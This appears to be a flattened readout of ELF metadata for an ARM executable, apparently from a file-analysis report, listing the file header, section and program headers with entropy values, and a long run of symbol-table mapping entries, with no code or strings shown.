                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x8194
                                          Flags:0x4000002
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:5
                                          Section Header Offset:123504
                                          Section Header Size:40
                                          Number of Section Headers:29
                                          Header String Table Index:26
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x80d40xd40x100x00x6AX004
                                          .textPROGBITS0x80f00xf00x14e400x00x6AX0016
                                          .finiPROGBITS0x1cf300x14f300x100x00x6AX004
                                          .rodataPROGBITS0x1cf400x14f400x26980x00x2A008
                                          .ARM.extabPROGBITS0x1f5d80x175d80x180x00x2A004
                                          .ARM.exidxARM_EXIDX0x1f5f00x175f00x1180x00x82AL204
                                          .eh_framePROGBITS0x277080x177080x40x00x3WA004
                                          .tbssNOBITS0x2770c0x1770c0x80x00x403WAT004
                                          .init_arrayINIT_ARRAY0x2770c0x1770c0x40x00x3WA004
                                          .fini_arrayFINI_ARRAY0x277100x177100x40x00x3WA004
                                          .jcrPROGBITS0x277140x177140x40x00x3WA004
                                          .gotPROGBITS0x277180x177180xa80x40x3WA004
                                          .dataPROGBITS0x277c00x177c00x2780x00x3WA004
                                          .bssNOBITS0x27a380x17a380xb0680x00x3WA004
                                          .commentPROGBITS0x00x17a380xbb00x00x0001
                                          .debug_arangesPROGBITS0x00x185e80x1400x00x0008
                                          .debug_pubnamesPROGBITS0x00x187280x2130x00x0001
                                          .debug_infoPROGBITS0x00x1893b0x20430x00x0001
                                          .debug_abbrevPROGBITS0x00x1a97e0x6e20x00x0001
                                          .debug_linePROGBITS0x00x1b0600xe760x00x0001
                                          .debug_framePROGBITS0x00x1bed80x2b80x00x0004
                                          .debug_strPROGBITS0x00x1c1900x8ca0x10x30MS001
                                          .debug_locPROGBITS0x00x1ca5a0x118f0x00x0001
                                          .debug_rangesPROGBITS0x00x1dbe90x5580x00x0001
                                          .ARM.attributesARM_ATTRIBUTES0x00x1e1410x160x00x0001
                                          .shstrtabSTRTAB0x00x1e1570x1170x00x0001
                                          .symtabSYMTAB0x00x1e6f80x54500x100x0287674
                                          .strtabSTRTAB0x00x23b480x2abd0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          EXIDX0x175f00x1f5f00x1f5f00x1180x1184.48630x4R 0x4.ARM.exidx
                                          LOAD0x00x80000x80000x177080x177085.98830x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                          LOAD0x177080x277080x277080x3300xb3984.50560x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                                          TLS0x1770c0x2770c0x2770c0x00x80.00000x4R 0x4.tbss
                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                          .symtab0x80d40SECTION<unknown>DEFAULT1
                                          .symtab0x80f00SECTION<unknown>DEFAULT2
                                          .symtab0x1cf300SECTION<unknown>DEFAULT3
                                          .symtab0x1cf400SECTION<unknown>DEFAULT4
                                          .symtab0x1f5d80SECTION<unknown>DEFAULT5
                                          .symtab0x1f5f00SECTION<unknown>DEFAULT6
                                          .symtab0x277080SECTION<unknown>DEFAULT7
                                          .symtab0x2770c0SECTION<unknown>DEFAULT8
                                          .symtab0x2770c0SECTION<unknown>DEFAULT9
                                          .symtab0x277100SECTION<unknown>DEFAULT10
                                          .symtab0x277140SECTION<unknown>DEFAULT11
                                          .symtab0x277180SECTION<unknown>DEFAULT12
                                          .symtab0x277c00SECTION<unknown>DEFAULT13
                                          .symtab0x27a380SECTION<unknown>DEFAULT14
                                          .symtab0x00SECTION<unknown>DEFAULT15
                                          .symtab0x00SECTION<unknown>DEFAULT16
                                          .symtab0x00SECTION<unknown>DEFAULT17
                                          .symtab0x00SECTION<unknown>DEFAULT18
                                          .symtab0x00SECTION<unknown>DEFAULT19
                                          .symtab0x00SECTION<unknown>DEFAULT20
                                          .symtab0x00SECTION<unknown>DEFAULT21
                                          .symtab0x00SECTION<unknown>DEFAULT22
                                          .symtab0x00SECTION<unknown>DEFAULT23
                                          .symtab0x00SECTION<unknown>DEFAULT24
                                          .symtab0x00SECTION<unknown>DEFAULT25
                                          $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                                          $a.symtab0x1cf300NOTYPE<unknown>DEFAULT3
                                          $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                                          $a.symtab0x1cf3c0NOTYPE<unknown>DEFAULT3
                                          $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x82cc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x84240NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x86400NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x86ac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x871c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x8ab00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x91440NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x97600NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x9a000NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xa1b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xa8ac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xaf580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xb2b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xb4e00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xb7800NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xbbb80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xc0a40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xc0f40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xc1980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xc26c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xcd840NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xcdb00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xcef40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xcfc80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xd0ac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xd2380NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xd4100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xd5740NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xdcf80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xdd680NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xddd40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xde640NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xdf980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xdfc00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xe4c80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xe5900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xe6f00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xf2700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xf7940NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xff040NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xff280NOTYPE<unknown>DEFAULT2
                                          $a.symtab0xffd80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x100880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x102ec0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x108540NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1087c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x108b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x108fc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x109200NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x109440NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x109b00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x109cc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x109e00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10a3c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10ad00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10b600NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10c9c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10d980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10eac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10ec00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x10f580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1104c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1108c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x110c40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x110d80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1111c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x111600NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x111a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x111e00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x112c00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x112f80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1133c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1137c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x113c00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x114440NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x114840NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x115100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x115400NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x116500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x117200NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x117e40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x118940NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1197c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1199c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x119d00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x11a340NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x11a640NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x11b340NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x123000NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x123a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x123e40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x125940NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x125e80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12b580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12b900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12c500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12c600NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12c700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12d100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12d700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12d980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12dbc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12e880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12ea00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12fac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x12fd40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x130180NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1308c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x130d00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x131140NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x131880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x131cc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x132140NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x132540NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x132980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x133080NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x133500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x133d80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1341c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1348c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x134d80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x135600NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x135a80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x135ec0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1363c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x136500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x137140NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x137800NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x141300NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x142700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x146300NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14ad00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14b100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14c380NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14c500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14cf40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14dac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14e6c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14f100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x14fa00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x150780NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x151700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1525c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x153200NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1546c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x15a900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x15e5c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x15ef40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x15f3c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1602c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x161640NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x161bc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x161c40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x161f40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1624c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x162540NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x162840NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x162dc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x162e40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x163140NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1636c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x163740NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x163a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x164280NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x165040NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x165c40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x166180NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x166700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16a5c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16ad80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16b040NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16b8c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16b940NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16ba00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16bb00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16bc00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16c000NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16c680NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16ccc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16d6c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16d980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16dac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16dc00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16dd40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16dfc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16e340NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16e740NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16e880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16ecc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16f0c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16f4c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16fac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x16fec0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x170580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1706c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x170ac0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x172240NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x173100NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x176b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x177080NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1772c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x177e80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x17b180NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x17b380NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x17f980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x180d80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x181580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x182bc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x183980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x183c80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1843c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x184680NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x185c40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x18db80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x18efc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x190180NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x192c80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x196740NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x197a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x198400NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x19cd00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x19cf00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x19de00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x19ec00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x19fb00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a09c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a0e00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a1300NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a17c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a1a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a21c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a3140NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a38c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a3f40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a6480NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a6540NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a68c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a6e40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a73c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a7480NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a8900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1a8b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1aa740NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1aacc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1aba80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ac700NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1aca00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ad440NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ad800NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ada40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ade40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ae540NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1af980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1b3b40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1b8500NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1b9900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1b9e40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ba300NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ba7c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ba840NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ba880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bab40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bac00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bacc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bcec0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1be3c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1be580NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1beb80NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bf240NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bfdc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1bffc0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c1400NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c6880NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c6900NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c6980NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c6a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c75c0NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1c7a00NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1ceb40NOTYPE<unknown>DEFAULT2
                                          $a.symtab0x1cefc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x81280NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x277100NOTYPE<unknown>DEFAULT10
                                          $d.symtab0x81800NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x2770c0NOTYPE<unknown>DEFAULT9
                                          $d.symtab0x81c40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x82c40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x84200NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x8a7c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x91400NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x975c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xa1b00NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xa8a80NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xaf540NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xbbb40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xc0a00NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xc2680NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xcd600NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xcdac0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xcfc40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xd09c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xd22c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xd3ec0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x277c00NOTYPE<unknown>DEFAULT13
                                          $d.symtab0xd5680NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xdcc40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x277e80NOTYPE<unknown>DEFAULT13
                                          $d.symtab0x277ec0NOTYPE<unknown>DEFAULT13
                                          $d.symtab0x277f00NOTYPE<unknown>DEFAULT13
                                          $d.symtab0xdd580NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xddc40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xde540NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xdf880NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xe58c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xe6e40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xf24c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xf6cc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1e4840NOTYPE<unknown>DEFAULT4
                                          $d.symtab0x1e48d0NOTYPE<unknown>DEFAULT4
                                          $d.symtab0xff240NOTYPE<unknown>DEFAULT2
                                          $d.symtab0xffd00NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x100800NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x102ac0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x277f40NOTYPE<unknown>DEFAULT13
                                          $d.symtab0x1084c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x00NOTYPE<unknown>DEFAULT21
                                          $d.symtab0x200NOTYPE<unknown>DEFAULT21
                                          $d.symtab0x260NOTYPE<unknown>DEFAULT21
                                          $d.symtab0x10f500NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1103c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x110880NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x110c00NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x111140NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x111580NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1119c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x111dc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x112b00NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x112f40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x113380NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x113780NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x113bc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1143c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x114800NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1150c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x116340NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x117180NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x117d80NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1188c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1e5880NOTYPE<unknown>DEFAULT4
                                          $d.symtab0x119680NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x119980NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x119cc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x11a280NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x11b2c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x122dc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1e5c80NOTYPE<unknown>DEFAULT4
                                          $d.symtab0x125900NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x125dc0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x12b280NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x278440NOTYPE<unknown>DEFAULT13
                                          $d.symtab0x1e5d00NOTYPE<unknown>DEFAULT4
                                          $d.symtab0x12c480NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x12e800NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x12f9c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1e6540NOTYPE<unknown>DEFAULT4
                                          $d.symtab0x130100NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x130840NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x130c80NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1310c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x131800NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x131c40NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x1320c0NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x132500NOTYPE<unknown>DEFAULT2
                                          $d.symtab0x132900NOTYPE<unknown>DEFAULT2
